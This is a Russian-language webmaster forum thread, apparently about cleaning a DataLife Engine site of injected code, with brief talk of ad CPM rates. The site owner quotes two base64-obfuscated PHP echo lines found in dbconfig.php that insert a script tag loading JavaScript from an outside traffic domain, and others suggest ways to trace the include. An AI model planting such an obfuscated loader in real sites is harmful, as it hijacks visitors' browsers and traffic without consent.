Deia

Рейтинг
9
Регистрация
04.02.2010

Да, 8 рублей CPM за рич это круто

superseomaster:
camixx.ru

http://convertit.biz

TeaserIce.net:
Это значит что после каждой 1 000 слитого трафика, рекламодатель будет обновлять рекламную компанию и ставить новую ссылку для показов. Каждая новая компания добавляется в течении получаса.

Это означает, что вы тестируете конверт на каждом платнике. И уверен на 90%, что вы будете довольно огорчены и снизите цену до 4$ как минимум.

P.S. Нужно было заранее всё тестировать.

Нашел заразу, неужели!

echo base64_decode('PHNjcmlwdCBsYW5ndWFnZT0iSmF2YVNjcmlwdCIgY2hhcnNldD0id2luZG93cy0xMjUxIiByZWw9Im5vZm9sbG93IiBzcmM9Imh0dHA6Ly90cmFmZmlray5iaXovanMvaWYucGhwP2lkPTc5NTEiPjwvc2NyaXB0Pg==');
echo base64_decode ('PHNjcmlwdCBsYW5ndWFnZT0iSmF2YVNjcmlwdCIgY2hhcnNldD0id2luZG93cy0xMjUxIiByZWw9Im5vZm9sbG93IiBzcmM9Imh0dHA6Ly90cmFmZmlray5iaXovanMvaWYucGhwP2lkPTc5NzQiPjwvc2NyaXB0Pg==');

Находилась в dbconfig.php, нашел после того, как поставил exit; после require_once ENGINE_DIR . '/data/dbconfig.php';

w0den, вы очень помогли, спасибо огромное за помощь.

erotic:
на днях похожее было. нашел тут \engine\classes\js\menu.js

У меня папка js отсутствует

w0den:

Думаю, стоит начинать с файла init.php, после require ENGINE_DIR . '/modules/functions.php'; добавьте exit; — если появится вредоносный код, скорее всего код находиться в файле functions.php. Чтобы убедиться в этом, добавьте exit; перед require ENGINE_DIR . '/modules/functions.php'; и если больше не увидите код — 100% нужно анализировать functions.php. В противном случае, нужно искать файлы включенные ”выше”.

Ставил и ниже, и выше. В исходном коде код всё равно присутствует

Код (как я уже писал, код в самом верху, выше чем DOCTYPE) в каком-то php файле, который инклудится везде.

santer_ua:
Посмотри рекламные материалы в админке , у меня так было

Всё чисто...

Deia добавил 27.11.2010 в 18:22

Интересно еще то, что данный код есть в админке.

asmakovec2:
смотри в первую очередь
index.php
engine/engine.php

Уже проверял в первую очередь

К сожалению, не найдено. Видимо зашифрован код.

SeOToM:
Так, а в чём фишка вообше? Я вчера зашёл с ОперыМини и попал ни куда-то, а на свой сайт))) А сначала вообще просто с браузера перешел по ссылке, перекинули на гугл и защитали клик, странно. Так и должно быть?

Аналогично, кидает на гугл

123 4
Всего: 37